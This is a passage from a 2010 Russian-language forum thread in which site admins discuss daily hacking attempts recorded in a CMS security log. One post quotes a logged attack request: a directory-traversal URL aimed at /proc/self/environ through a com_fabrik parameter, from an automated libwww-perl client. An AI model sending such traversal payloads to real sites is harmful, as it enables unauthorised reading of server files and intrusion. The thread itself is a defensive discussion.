Дата размещения: 17.06.2010 - 09:26:58





Кстатье, а как это гамно из файла security.php вычистить, а то уже 150kb набралось?
Перейти в начало страницы
 
     Выделите текст перед нажатием цитаты
+Цитировать сообщение
Mylenovez
сообщение Jun 18 2010, 03:12
Сообщение #16


Живу на АС
Иконка группы

Группа: Пользователи

Сообщений: 221
Регистрация:
1.11.2008
Пользователь №: 6,111
Спасибо сказали: 35

Вставить ник




ЦИТАТА(DjSalamander @ Вчера, 21:48 )
Кстатье, а как это гамно из файла security.php вычистить, а то уже 150kb набралось?


Вот нифигасе, а почему у тебя права-то на запись стоят для всяких говнокидателей? Не удивлюсь, если у тебя ещё Register globals включено, это тогда вообще круто (можно посмотреть это в админке, в блоке Системная информация).
Перейти в начало страницы
 
     Выделите текст перед нажатием цитаты
+Цитировать сообщение
DjSalamander
сообщение Jun 18 2010, 09:52
Сообщение #17


прорвемся...
Иконка группы

Группа: [..AS..]

Сообщений: 2,388
Регистрация:
6.9.2008
Из: Latvia Riga-Vangaži
Пользователь №: 5,367
Спасибо сказали: 457

Вставить ник




ЦИТАТА(Mylenovez @ Сегодня, 02:12 )
Register globals включено


нет, и никогда небыл включен

ЦИТАТА(Mylenovez @ Сегодня, 02:12 )
а почему у тебя права-то на запись стоят


тфу неправильно написал,
это я в заблуждения ввел, сорри, из файла logs/security/hacks.txt
Перейти в начало страницы
 
     Выделите текст перед нажатием цитаты
+Цитировать сообщение
Immeasurability
сообщение Jun 18 2010, 10:58
Сообщение #18


Живу на АС
Иконка группы

Группа: Пользователи

Сообщений: 752
Регистрация:
11.12.2007
Из: Москва а так по всюду гы
Пользователь №: 1,591
Спасибо сказали: 154

Вставить ник




DjSalamander
те пытались проверить базу на доступность взлома
Перейти в начало страницы
 
     Выделите текст перед нажатием цитаты
+Цитировать сообщение
rocksmart
сообщение Jun 18 2010, 12:43
Сообщение #19


Продвинутый юзверь
Иконка группы

Группа: Пользователи

Сообщений: 99
Регистрация:
30.1.2008
Из: Пермь
Пользователь №: 2,154
Спасибо сказали: 26

Вставить ник




движок рулит - За все время использования ни одного взлома. птьфу птьфу птьфу (IMG:http://antislaed.net/style_emoticons/default/biggrin.gif) (IMG:http://antislaed.net/style_emoticons/default/biggrin.gif) (IMG:http://antislaed.net/style_emoticons/default/biggrin.gif) (IMG:http://antislaed.net/style_emoticons/default/biggrin.gif) (IMG:http://antislaed.net/style_emoticons/default/biggrin.gif)
Перейти в начало страницы
 
     Выделите текст перед нажатием цитаты
+Цитировать сообщение
DjSalamander
сообщение Jun 18 2010, 13:22
Сообщение #20


прорвемся...
Иконка группы

Группа: [..AS..]

Сообщений: 2,388
Регистрация:
6.9.2008
Из: Latvia Riga-Vangaži
Пользователь №: 5,367
Спасибо сказали: 457

Вставить ник




ЦИТАТА(Immeasurability @ Сегодня, 09:58 )
те пытались проверить базу на доступность взлома


это ясно, уже задрали ковырятса, почти каждый день такая хрень
в основном от сюда лезут-
IP Адрес: 221.144.12.141
Пользователь: Guest
Ссылка: /index.php?name=search&word=lejupl///*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ
Браузер: libwww-perl/5.79
Дата размещения: 18.06.2010 - 09:53:19


задлбало это уже по самое немогу
Перейти в начало страницы
 
     Выделите текст перед нажатием цитаты
+Цитировать сообщение

Ответить в данную темуНачать новую тему

10 чел. читают эту тему (гостей: 10, скрытых пользователей: 0)
Пользователей: 0
 

RSS Текстовая версия Сейчас: 25 November 2024 - 13:35
Хостинг предоставлен NetLevel.Ru   Eleanor CMS